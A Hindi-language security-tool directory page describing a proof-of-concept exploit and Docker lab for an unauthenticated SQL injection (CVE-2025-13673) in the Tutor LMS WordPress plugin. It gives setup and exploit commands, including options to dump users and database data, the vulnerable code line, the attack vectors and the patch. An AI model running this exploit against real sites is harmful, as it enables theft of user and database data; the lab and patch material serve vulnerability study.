Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-13673 — CVE-2025-13673: Tutor LMS SQL Injection PoC + Docker लैब | Kitploit
उपकरण/GitHubGitHub/dinosn/cve-2025-13673
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubdinosn/cve-2025-13673

CVE-2025-13673

CVE-2025-13673: Tutor LMS SQL Injection PoC + Docker लैब

रिपॉजिटरी देखें
23 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-13673 — Tutor LMS SQL इंजेक्शन लैब

Tutor LMS WordPress प्लगइन (<= 3.9.6) में coupon_code पैरामीटर के माध्यम से अप्रमाणित SQL इंजेक्शन।

त्वरित आरंभ

root@kitploit:~
# 1. Clone and start the lab
git clone https://github.com/dinosn/CVE-2025-13673.git
cd CVE-2025-13673
./setup.sh            # Deploys WordPress + Tutor LMS 3.9.3

# 2. Run the exploit
pip install requests   # only dependency

# Unauthenticated (time-based blind — no credentials needed)
python3 exploit.py http://localhost:8080

# Authenticated (UNION-based — instant extraction)
python3 exploit.py http://localhost:8080 -u testuser -p test123 --all

भेद्यता विवरण

फ़ील्डमान
CVECVE-2025-13673
प्रभावितTutor LMS <= 3.9.6
फिक्स्ड3.9.7
प्रकारSQL इंजेक्शन (CWE-89)
CVSS7.5 / 9.3
प्रमाणीकरणकोई नहीं (ब्लाइंड) / सब्सक्राइबर (UNION)

मूल कारण

QueryHelper::prepare_where_clause() कच्चे स्ट्रिंग संयोजन के साथ SQL WHERE क्लॉज़ बनाता है:

root@kitploit:~
// helpers/QueryHelper.php — VULNERABLE
$value = is_numeric( $value ) ? $value : "'" . $value . "'";

कोई एस्केपिंग नहीं है। एक सिंगल कोट लिटरल से बाहर निकलकर मनमाना SQL चलाने की अनुमति देता है।

हमले के वेक्टर

अप्रमाणित: POST / के साथ tutor_action=tutor_pay_now। WordPress का init हुक इसे सभी आगंतुकों के लिए डिस्पैच करता है। _tutor_nonce हर फ्रंटएंड पेज में एम्बेडेड होता है और अनाम सत्रों के लिए मान्य रहता है। डेटा निष्कर्षण SLEEP() के माध्यम से।

सब्सक्राइबर+: POST /wp-admin/admin-ajax.php के साथ action=tutor_apply_coupon। इंजेक्टेड UNION SELECT डेटा के साथ JSON लौटाता है — तत्काल निष्कर्षण के लिए प्रतिक्रिया में दो कॉलम प्रतिबिंबित होते हैं।

पैच (3.9.7)

root@kitploit:~
- $val = is_numeric( $val ) ? $val : "'" . $val . "'";
+ // Value now passed through $wpdb->prepare('%s', $value)

एक्सप्लॉइट उपयोग

root@kitploit:~
usage: exploit.py [-h] [-u USERNAME] [-p PASSWORD] [--course-id COURSE_ID]
                  [--dump-users] [--db-info] [--options] [--all]
                  [--delay DELAY]
                  url

Modes:
  Default (no -u/-p):  Unauthenticated time-based blind SQLi
  With -u/-p:          Authenticated UNION-based (fast)

Examples:
  exploit.py http://target                            # unauth blind
  exploit.py http://target -u student -p pass --all   # auth UNION

विभिन्न संस्करणों का परीक्षण

root@kitploit:~
# Test version 3.9.5 (has esc_sql partial mitigation)
./setup.sh 3.9.5

# Test version 3.9.7 (should be fixed)
./setup.sh 3.9.7

फ़ाइलें

फ़ाइलविवरण
exploit.pyदोहरी-मोड PoC: बिना प्रमाणीकरण ब्लाइंड + प्रमाणित UNION
setup.shएक-कमांड लैब परिनियोजन
docker-compose.ymlWordPress 6.7 + MySQL 8.0

संदर्भ

  • Wordfence Advisory
  • Patchstack Advisory

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए।

टूल डाउनलोड करें